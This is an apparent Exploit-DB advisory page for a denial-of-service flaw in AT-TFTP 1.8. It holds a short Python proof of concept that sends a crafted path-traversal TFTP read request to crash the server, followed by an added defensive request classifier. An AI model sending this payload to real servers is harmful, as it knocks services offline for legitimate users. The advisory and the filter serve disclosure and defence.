Vendor: AT-TFTP
By: Antu Sanadi
CVSS: 7.5 HIGH
Denial-of-Service
CWE: 400
Product Name: AT-TFTP
Affected Version From: 1.8
Affected Version To: 1.8
Patch Exists: No
Related CWE:
CPE: a:at-tftp_project:at-tftp:1.8
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

Remote Denial-of-Service Vulnerability in AT-TFTP

The vulnerability allows remote attackers to crash the AT-TFTP application, denying service to legitimate users.

Mitigation:

No known mitigation or remediation for this vulnerability.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/47561/info

AT-TFTP is prone to a remote denial-of-service vulnerability.

Successfully exploiting this issue allows remote attackers to crash the affected application, denying service to legitimate users.

AT-TFTP 1.8 is affected; other versions may also be vulnerable. 

#!/usr/bin/python

##############################################################################
# Exploit   : http://secpod.org/blog/?p=XXXXXXXXXXXXXXXXXXXXXXXXX
#             http://secpod.org/wintftp_dos_poc.py
# Reference : 
# Author    : Antu Sanadi from SecPod Technologies (www.secpod.com)
#
# Exploit will crash AT-TFTP Server v1.8 Service
# Tested against AT-TFTP Server v1.8 server
##############################################################################

import socket
import sys

host = '127.0.0.1'
port = 69

try:
	s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
	print "socket() failed"
	sys.exit(1)

addr = (host, port)

# TFTP read request: opcode 0x0001, filename "../../../boot.ini", mode "netascii"
data ='\x00\x01\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x62\x6f\x6f' +\
      '\x74\x2e\x69\x6e\x69\x00\x6e\x65\x74\x61\x73\x63\x69\x69\x00'
s.sendto(data, (host, port))
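
Added example, not part of the original advisory or PoC: the datagram above is a TFTP read request (opcode 1) for `../../../boot.ini` in `netascii` mode, and the page lists no patch, so one defensive option is to inspect requests before they reach the server. The Python 3 code below classifies a UDP payload using the RFC 1350 request layout. The name `classify`, the sample datagrams, and the decision to flag traversal-style or absolute filenames are assumptions, since the page does not state the root cause of the crash.

```python
import struct

RRQ, WRQ = 1, 2                        # TFTP request opcodes (RFC 1350)
MODES = {"netascii", "octet", "mail"}  # transfer modes defined by RFC 1350


def classify(datagram: bytes) -> str:
    """Return 'ignore', 'malformed', 'traversal' or 'ok' for one UDP payload."""
    if len(datagram) < 2:
        return "malformed"
    (opcode,) = struct.unpack("!H", datagram[:2])
    if opcode not in (RRQ, WRQ):
        return "ignore"                # DATA/ACK/ERROR are not inspected here
    # Request body: filename NUL mode NUL [option NUL value NUL ...]
    fields = datagram[2:].split(b"\x00")
    if len(fields) < 3 or not fields[0]:
        return "malformed"             # a NUL terminator or the filename is missing
    filename = fields[0].decode("latin-1")
    mode = fields[1].decode("latin-1").lower()
    if mode not in MODES:
        return "malformed"
    # Treat '\' as a separator too, since Windows servers accept it.
    parts = filename.replace("\\", "/").split("/")
    absolute = filename.startswith(("/", "\\")) or filename[1:2] == ":"
    if absolute or ".." in parts:
        return "traversal"             # name points outside the TFTP root
    return "ok"


# Constructed samples; the first has the same bytes as the PoC datagram.
SAMPLES = [
    b"\x00\x01../../../boot.ini\x00netascii\x00",
    b"\x00\x01firmware.bin\x00octet\x00",
    b"\x00\x02configs\\..\\..\\x\x00octet\x00",
    b"\x00\x01firmware.bin\x00octet",   # missing final NUL
    b"\x00\x04\x00\x01",                # ACK for block 1
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(classify(sample), sample)
```

A filter or IDS rule built on this would drop or alert on anything other than `ok` and `ignore` before the packet reaches the TFTP service.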